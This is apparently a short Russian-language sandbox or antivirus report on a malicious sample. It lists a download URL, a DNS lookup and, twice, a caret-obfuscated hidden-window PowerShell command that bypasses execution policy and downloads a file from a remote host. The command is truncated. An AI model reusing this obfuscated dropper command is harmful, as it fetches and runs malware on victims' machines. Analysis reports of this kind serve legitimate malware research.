Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^WErshE^L^l^.exE^ -e^xeCu^tIO^np^oL^i^Cy^ B^YPa^sS ^-^NOpr^o^f^i^l^E -WiN^DOw^sTy^le ^Hi^dDe^n^ ^(^NeW-ob^JeCT SY^STe^M.Ne^t^.w^EB^c^LI^ENt)^.DowNlO^ad^fIle(^'http://as...
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "pO^WErshE^L^l^.exE^ -e^xeCu^tIO^np^oL^i^Cy^ B^YPa^sS ^-^NOpr^o^f^i^l^E -WiN^DOw^sTy^le ^Hi^dDe^n^ ^(^NeW-ob^JeCT SY^STe^M.Ne^t^.w^EB^c^LI^ENt)^.DowNlO^ad^fIle(^'http://as...' (со скрытым окном)